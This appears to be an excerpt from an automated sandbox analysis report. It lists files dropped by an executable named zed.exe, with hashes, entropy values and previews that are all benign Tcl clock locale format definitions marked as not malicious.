                                                                                                                                                                                                                                            SHA-512:0D663233E6C96515713B3B829B605E72D8CE581AEF1C02FF6CA96598C040DCA42A3AC765EE9B5002E8969A331EB19A9AF0F8215F7113D0AD2F2EB2C560239D53
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset en_IN AM "AM".. ::msgcat::mcset en_IN PM "PM".. ::msgcat::mcset en_IN DATE_FORMAT "%d %B %Y".. ::msgcat::mcset en_IN TIME_FORMAT "%H:%M:%S".. ::msgcat::mcset en_IN DATE_TIME_FORMAT "%d %B %Y %H:%M:%S %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):307
                                                                                                                                                                                                                                            Entropy (8bit):4.939458132662909
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoyejbmvFjo63v1o63v6p6HyFjoy7+3vjb0ysvn:4EnLB383temdj3vd3v6QS1S3ven
                                                                                                                                                                                                                                            MD5:7E81708F107658FFD31C3BFBF704A488
                                                                                                                                                                                                                                            SHA1:7941ED040707591B68581337F8D90FA03C5E1406
                                                                                                                                                                                                                                            SHA-256:EC305B7CB393421E6826D8F4FEA749D3902EBA53BFA488F2B463412F4070B9ED
                                                                                                                                                                                                                                            SHA-512:8F038FF960F81D96FF9E3454D8ABDA7FFDA5B99DA304ACECC42E74DDBED839388246F66B58928DA902D3B475FBA46602B34F6829A87ECB1124FFC47C036B4DBE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset en_NZ DATE_FORMAT "%e/%m/%Y".. ::msgcat::mcset en_NZ TIME_FORMAT "%H:%M:%S".. ::msgcat::mcset en_NZ TIME_FORMAT_12 "%I:%M:%S %P %z".. ::msgcat::mcset en_NZ DATE_TIME_FORMAT "%e/%m/%Y %H:%M:%S %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):329
                                                                                                                                                                                                                                            Entropy (8bit):4.824360175945298
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoojoOo2e4soe3v6ay/5o27+3v4x6HyFvn:4EnLB38304u3v6ay/k3v4ISVn
                                                                                                                                                                                                                                            MD5:E2E3BD806C20D7FB88109B7F3B84C072
                                                                                                                                                                                                                                            SHA1:2D7AD6BECA9C4D611BAE9747AD55A3E9385C2B42
                                                                                                                                                                                                                                            SHA-256:3A9C22B07906544C04F7A29B800FCE87C09D7FDF5C251236925115CF251A3890
                                                                                                                                                                                                                                            SHA-512:B14756B59BCABF8B29B41AC688E4F3A011735AF190B88F88B7B5FDDD3DA77F63FFC0F7875B3B453729CD3BC65E79F75F6E632CA68952EF473F78337D89E80BF2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset en_PH AM "AM".. ::msgcat::mcset en_PH PM "PM".. ::msgcat::mcset en_PH DATE_FORMAT "%B %e, %Y".. ::msgcat::mcset en_PH TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset en_PH DATE_TIME_FORMAT "%B %e, %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.911413468674953
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoQW53FuoQGuX3v6ZwoQWa+3v3F0fxvn:4EnLB383V83FOJ3v62c3v3FEn
                                                                                                                                                                                                                                            MD5:F70245D73BE985091459ADF74B089EBC
                                                                                                                                                                                                                                            SHA1:21D52C336C08526D9DCF1AEC1F0701CB8B073D7A
                                                                                                                                                                                                                                            SHA-256:D565679AE9AACBFE3B5273FE29BD46F46FFBB63C837D7925C11356D267F5FF82
                                                                                                                                                                                                                                            SHA-512:171C70EB10D5E6421A55CE9B1AE99763E23FB6A6F563F69FE099D07C07FCA0CF8D3F6F00C5BB38BFF59A5F4C311506C4A9593F86C12B3B9E1861E72656B3800B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset en_SG DATE_FORMAT "%d %b %Y".. ::msgcat::mcset en_SG TIME_FORMAT_12 "%P %I:%M:%S".. ::msgcat::mcset en_SG DATE_TIME_FORMAT "%d %b %Y %P %I:%M:%S %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):251
                                                                                                                                                                                                                                            Entropy (8bit):4.937431055623088
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoOr0lIZoOK3v6poOs+3v0l6Uvn:4EnLB383z+3v6R3vl2n
                                                                                                                                                                                                                                            MD5:FCA7B13CA6C9527D396A95BEA94CC92D
                                                                                                                                                                                                                                            SHA1:E6F338A08F72DA11B97F70518D1565E6EF9AD798
                                                                                                                                                                                                                                            SHA-256:67C253E2A187AA814809418E5B7A21F3A1F9FB5073458A59D80290F58C6C1EB4
                                                                                                                                                                                                                                            SHA-512:37B8B4EA24B1C77AF0252A17660650CB2D4F8BB55C75817D6A94E1B81A3DDEF9913D12D3BF80C7BFE524CD0AD84E353E73238056759E6545BFE69EF5F806B8B7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset en_ZA DATE_FORMAT "%Y/%m/%d".. ::msgcat::mcset en_ZA TIME_FORMAT_12 "%I:%M:%S".. ::msgcat::mcset en_ZA DATE_TIME_FORMAT "%Y/%m/%d %I:%M:%S %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.934659260313229
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoEmGMoEs6W3v6ay/5oEmT+3vR6HyFvn:4EnLB383Zr0s6W3v6ay/ZJ3voSVn
                                                                                                                                                                                                                                            MD5:A302091F490344B7A79C9463480AD7CF
                                                                                                                                                                                                                                            SHA1:E3992D665077177BAD5A4771F1BAF52C2AD1829C
                                                                                                                                                                                                                                            SHA-256:6F4754CE29DFA4F0E7957923249151CE8277395D1AF9F102D61B185F85899E4E
                                                                                                                                                                                                                                            SHA-512:FEBDB0BD6D0FD4C592DB781836F93F0C579399D324112F8829B769303CC6EEA487AAB14EBD60ED1B4F3B3DABF501601C9F65656327FF54853BF2CD9EC6A2F00F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset en_ZW DATE_FORMAT "%d %B %Y".. ::msgcat::mcset en_ZW TIME_FORMAT_12 "%l:%M:%S %P".. ::msgcat::mcset en_ZW DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1285
                                                                                                                                                                                                                                            Entropy (8bit):4.3537859241297845
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83dRb4vyomrIsmZ55vrAO0LH+50ydAcveva:43PT5rWvrAR60yW6oa
                                                                                                                                                                                                                                            MD5:D87605E6282713EED41D56D53B7A04FD
                                                                                                                                                                                                                                            SHA1:41AAD4BD3B72CCBB6A762FEED3C24931642DD867
                                                                                                                                                                                                                                            SHA-256:98D52CAB5CA65789D1DC37949B65BAF0272AB87BCCBB4D4982C3AF380D5406AB
                                                                                                                                                                                                                                            SHA-512:4A4F51B2FD0248B52530B5D9FE6BFCFE455147CBE2C1F073804A53666945405F89CBBAD219FFF6904C1F92885F7C53B9D9A969732D662CEA8EC1717B3303B294
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset eo DAYS_OF_WEEK_ABBREV [list \.. "di"\.. "lu"\.. "ma"\.. "me"\.. "\u0135a"\.. "ve"\.. "sa"].. ::msgcat::mcset eo DAYS_OF_WEEK_FULL [list \.. "diman\u0109o"\.. "lundo"\.. "mardo"\.. "merkredo"\.. "\u0135a\u016ddo"\.. "vendredo"\.. "sabato"].. ::msgcat::mcset eo MONTHS_ABBREV [list \.. "jan"\.. "feb"\.. "mar"\.. "apr"\.. "maj"\.. "jun"\.. "jul"\.. "a\u016dg"\.. "sep"\.. "okt"\.. "nov"\.. "dec"\.. ""].. ::msgcat::mcset eo MONTHS_FULL [list \.. "januaro"\.. "februaro"\.. "marto"\.. "aprilo"\.. "majo"\.. "junio"\.. "julio"\.. "a\u016dgusto"\.. "septembro"\.. "oktobro"\.. "novembro"\.. "decembro"\.. ""].. ::m
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1232
                                                                                                                                                                                                                                            Entropy (8bit):4.2910064237800025
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:4aR83hEVIhlp4herIsYoorrClH+Fo9ARhprBvtFvr6:43OVY7+ercrmsYsr1thr6
                                                                                                                                                                                                                                            MD5:91DE6EE8E1A251EF73CC74BFB0216CAC
                                                                                                                                                                                                                                            SHA1:1FB01E3CF2CAFA95CC451BC34AB89DC542BBD7DD
                                                                                                                                                                                                                                            SHA-256:E9A6FE8CCE7C808487DA505176984D02F7D644425934CEDB10B521FE1E796202
                                                                                                                                                                                                                                            SHA-512:46CFD80E68461F165EE6A93AB6B433E4D4DA6A9A76CB7F3EF5766AC67567A7AFFB7B4E950A5AFA7C69C91F72AC82D2A448D32E39BBFC0BF26D2257460471EEC1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es DAYS_OF_WEEK_ABBREV [list \.. "dom"\.. "lun"\.. "mar"\.. "mi\u00e9"\.. "jue"\.. "vie"\.. "s\u00e1b"].. ::msgcat::mcset es DAYS_OF_WEEK_FULL [list \.. "domingo"\.. "lunes"\.. "martes"\.. "mi\u00e9rcoles"\.. "jueves"\.. "viernes"\.. "s\u00e1bado"].. ::msgcat::mcset es MONTHS_ABBREV [list \.. "ene"\.. "feb"\.. "mar"\.. "abr"\.. "may"\.. "jun"\.. "jul"\.. "ago"\.. "sep"\.. "oct"\.. "nov"\.. "dic"\.. ""].. ::msgcat::mcset es MONTHS_FULL [list \.. "enero"\.. "febrero"\.. "marzo"\.. "abril"\.. "mayo"\.. "junio"\.. "julio"\.. "agosto"\.. "septiembre"\.. "octubre"\.. "noviembre"\.. "diciembre"\.. ""].. ::msgc
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):248
                                                                                                                                                                                                                                            Entropy (8bit):4.878377455979812
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xo8GzvFjot/W3v1o8T+3v9ysvn:4EnLB3833GzdV3vLK3vnn
                                                                                                                                                                                                                                            MD5:313966A7E4F50BB77996FDE45E342CA9
                                                                                                                                                                                                                                            SHA1:021DF7211DAE9A635D52F7005672C157DBBAE182
                                                                                                                                                                                                                                            SHA-256:B97DCEA4FEC3E14632B1511D8C4F9E5A157D97B4EBBC7C6EE100C3558CB2947F
                                                                                                                                                                                                                                            SHA-512:79DCC76263310523BAF1100C70918FCE6BECB47BE360E4A26F11C61F27E14FC28B588A9253AA0C1F08F45AE8A03312A30FBDCF4FDFFDC5BF9D086C4B539DE022
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_AR DATE_FORMAT "%d/%m/%Y".. ::msgcat::mcset es_AR TIME_FORMAT "%H:%M:%S".. ::msgcat::mcset es_AR DATE_TIME_FORMAT "%d/%m/%Y %H:%M:%S %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.924579610789789
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoYePWWjoU3v6ry/5oY7+3vPUe6HyFvn:4EnLB383nedh3v6ry/nS3vs3SVn
                                                                                                                                                                                                                                            MD5:EF58B1097A3C6F2133BD7AA8CCC1AD1B
                                                                                                                                                                                                                                            SHA1:BD479E4635F3CD70A6A90E07B7E92757BC9E2687
                                                                                                                                                                                                                                            SHA-256:B47F55539DB6F64304DEA080D6F9A39165F1B9D4704DCBA4C182DBD3AA31A11B
                                                                                                                                                                                                                                            SHA-512:F9EB1489E5002200D255A45DC57132DEFD2A2C6DE5BC049D0D9720575E4FDD1B6A212D9E15974C6A2E0D0886069EA0DD967AD7C20845EC38EB74CBED0C3E5BE1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_BO DATE_FORMAT "%d-%m-%Y".. ::msgcat::mcset es_BO TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_BO DATE_TIME_FORMAT "%d-%m-%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.9352990174129925
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xodvPWWjok3v6ry/5odo+3vPUe6HyFvn:4EnLB383OdV3v6ry/i3vs3SVn
                                                                                                                                                                                                                                            MD5:42BCE0EE3A3F9E9782E5DE72C989903A
                                                                                                                                                                                                                                            SHA1:0960646417A61E8C31D408AE00B36A1284D0300E
                                                                                                                                                                                                                                            SHA-256:9D1A2A6EBA673C6F6D964DBCDDF228CB64978F282E70E494B60D74E16A1DB9CB
                                                                                                                                                                                                                                            SHA-512:C53DDCC17F261CFFAA2205879A131CFD23A7BCF4D3787090A0EA8D18530C4805903ED6CF31B53A34C70510A314EBBB68676E9F128289B42C5EFBC701405D5645
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_CL DATE_FORMAT "%d-%m-%Y".. ::msgcat::mcset es_CL TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_CL DATE_TIME_FORMAT "%d-%m-%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.908553844782894
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xo4FjbmvFjo4F+3v6ry/5o4++3vjb0f6HyFvn:4EnLB3831mdD+3v6ry/P3vbSVn
                                                                                                                                                                                                                                            MD5:6A8F31AE734DCEE4845454408CDB3BC5
                                                                                                                                                                                                                                            SHA1:A3B9A0124D3CFA9E0E5957612897B23193AD5D59
                                                                                                                                                                                                                                            SHA-256:5FAC53ACFB305C055AFD0BA824742A78CB506046B26DAC21C73F0BB60C2B889A
                                                                                                                                                                                                                                            SHA-512:188A65CFE2FBD04D83F363AEA166F224137C8A7009A9EBEB24B2A9AC89D9484D3A7109A4CE08F5C0A28911D81571230CC37554F4F19956AE163F9304911EE53C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_CO DATE_FORMAT "%e/%m/%Y".. ::msgcat::mcset es_CO TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_CO DATE_TIME_FORMAT "%e/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.919346233482604
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xo76GzvFjoTW3v6ry/5o76T+3v9f6HyFvn:4EnLB383K6Gzdj3v6ry/K6K3vMSVn
                                                                                                                                                                                                                                            MD5:2EDDA3F61BA4D049E6C871D88322CF72
                                                                                                                                                                                                                                            SHA1:40AFB64AF810596FCBDBD742ACAFE25CE56F3949
                                                                                                                                                                                                                                            SHA-256:A33DC22330D087B8567670B4915C334FF1741EE03F05D616CC801ECFDA1D9E64
                                                                                                                                                                                                                                            SHA-512:B6A6059B44F064C5CB59A3DAFAA7BE9064EE3E38F5FA6391017D931EF3A2B471DC4D556B7BEC6852FD1F6260EF17F476754D6BEA89E035748E9304977513CFB5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_CR DATE_FORMAT "%d/%m/%Y".. ::msgcat::mcset es_CR TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_CR DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.913083040975068
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xomerQZ2jou3v6ry/5om7+3vrQZg6HyFvn:4EnLB383sk4/3v6ry/s3vkrSVn
                                                                                                                                                                                                                                            MD5:76CFD4F568EA799F9A4082865633FF97
                                                                                                                                                                                                                                            SHA1:B09846BBF7A78243A5075F2DC9241791DCBA434B
                                                                                                                                                                                                                                            SHA-256:8DC2F857E91912ED46A94EB6B37DD6170EA7BCDDCD41CB85C0926A74EE12FCC1
                                                                                                                                                                                                                                            SHA-512:58B20A8A5D1F8C19AC36E61965106266B7E6F7E95DDD6AD9C4BB9FD7FFC561CB0E2103639D901A6A78CE2DD154CBF7F3AE0F71B4DC1CCB11DC6BB40D9C6E2157
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_DO DATE_FORMAT "%m/%d/%Y".. ::msgcat::mcset es_DO TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_DO DATE_TIME_FORMAT "%m/%d/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.915857529388286
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xozgzvFjoro+3v6ry/5oz9+3v9f6HyFvn:4EnLB383OgzdkF3v6ry/OI3vMSVn
                                                                                                                                                                                                                                            MD5:94B713B1560FE7711EA746F1CEBD37CD
                                                                                                                                                                                                                                            SHA1:E7047E8F04D731D38FA328FBC0E1856C4A8BB23D
                                                                                                                                                                                                                                            SHA-256:52AB5A6C9DD4F130A75C049B3AF8F54B84071FC190374BCCF5FA0E1F3B91EB21
                                                                                                                                                                                                                                            SHA-512:EE807D4D74A609F642CC3C6FC3D736708F67A6931DEB95288AB5822DA256BE4C908A346036195CF4266408458906D28BB5C715EEAFCACFC4FE45D4E6D8E435FE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_EC DATE_FORMAT "%d/%m/%Y".. ::msgcat::mcset es_EC TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_EC DATE_TIME_FORMAT "%d/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.9102355704853435
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xohvjbmvFjoI3v6ry/5oho+3vjb0f6HyFvn:4EnLB383KmdJ3v6ry/W3vbSVn
                                                                                                                                                                                                                                            MD5:761D0A468DF2EE75BC2CAB09D5FF38CD
                                                                                                                                                                                                                                            SHA1:D627BE45FE71CCB3CA53153393C075FF5136C2F3
                                                                                                                                                                                                                                            SHA-256:19B4D3025156C060A16328370A3FDB9F141298DECFC8F97BE606F6438FECE2EE
                                                                                                                                                                                                                                            SHA-512:6CF7C9004A8A3B70495862B7D21921B1A6263C2153FEBC5C4997366498ABBFE70263B436C2B4998550780A4C3A58DCF0AAE7420FF9D414323D731FA44BD83104
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_GT DATE_FORMAT "%e/%m/%Y".. ::msgcat::mcset es_GT TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_GT DATE_TIME_FORMAT "%e/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.947925914291734
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoIvriSFjoP3v6ry/5oIo+3vrig6HyFvn:4EnLB383V+2m3v6ry/v3v+lSVn
                                                                                                                                                                                                                                            MD5:33CEE7F947A484B076F5FA7871A30FEB
                                                                                                                                                                                                                                            SHA1:F77F8D1F42008770A6FF1F5097C863ECF482BEBE
                                                                                                                                                                                                                                            SHA-256:07873D4D59BB41000706A844859C73D26B1FF794058AA83CFFCA804981A24038
                                                                                                                                                                                                                                            SHA-512:EBF6873F9CB554489EFCD352943100C00171E49D27153769D1C4DB25E2D1F44F2D34869B596C267C9BB59ED0444468D9982137CFB1C6035FB15A855BB867133B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_HN DATE_FORMAT "%m-%d-%Y".. ::msgcat::mcset es_HN TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_HN DATE_TIME_FORMAT "%m-%d-%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.9102355704853435
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoPjbmvFjoH+3v6ry/5oI+3vjb0f6HyFvn:4EnLB383UmdD3v6ry/k3vbSVn
                                                                                                                                                                                                                                            MD5:678D7A6DC32355246BF3AC485A24AF4D
                                                                                                                                                                                                                                            SHA1:B6C273D3BE5FB9F5A221B0333870CCE41CEDFDE4
                                                                                                                                                                                                                                            SHA-256:A0F57137D2C0ABDC933E03CFB188F5632176C195CEADB9DC80D469C8DC6CEDC6
                                                                                                                                                                                                                                            SHA-512:571404CCB0591C681C975E3F7A6C6972FAF2362F1D48BFC95E69A9EAE2DB3F40BF4B666C41950C4924E3FD820C61ED91204F92283B8554F1BD35B64D53BD4125
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_MX DATE_FORMAT "%e/%m/%Y".. ::msgcat::mcset es_MX TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_MX DATE_TIME_FORMAT "%e/%m/%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.918215906418583
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoe/GriSFjo3W3v6ry/5oe/T+3vrig6HyFvn:4EnLB383Re+2eW3v6ry/RS3v+lSVn
                                                                                                                                                                                                                                            MD5:471C41907CE5DB1F30C647A789870F78
                                                                                                                                                                                                                                            SHA1:C575A639609620AF7C56430991D0E4C2B50BDEC5
                                                                                                                                                                                                                                            SHA-256:6250663DA1378E54BEDCEF206583D212BC0D61D04D070495238D33715BB20CAE
                                                                                                                                                                                                                                            SHA-512:CAE32DF8F583542CAFE3292501725D85B697A5C1F9A0A7993490E8A69B6CE5CE3DE3AA2733B14D989A8D13B5E31B437DB42E9AB9D1851FE72313592C752B5061
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/loadICU.tcl -- do not edit..namespace eval ::tcl::clock {.. ::msgcat::mcset es_NI DATE_FORMAT "%m-%d-%Y".. ::msgcat::mcset es_NI TIME_FORMAT_12 "%I:%M:%S %P".. ::msgcat::mcset es_NI DATE_TIME_FORMAT "%m-%d-%Y %I:%M:%S %P %z"..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):257
                                                                                                                                                                                                                                            Entropy (8bit):4.906719336603863
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSyEtJLl73oo6d3/xoX5rQZ2joHE3v6ry/5oXa+3vrQZg6HyFvn:4EnLB383ak4F3v6ry/G3vkrSVn
                                                                                                                                                                                                                                            MD5:571F6716293442672521F70854A5AD05
                                                                                                                                                                                                                                            SHA1:525EBDEA6F85FC769B6C0C0B179BD98381647123
                                                                                                                                                                                                                                            SHA-256:EBB661C1C09E7D4F6FBCC4B2DAD0F41442B1FFDD27F003ABDC0375DD316E57D7
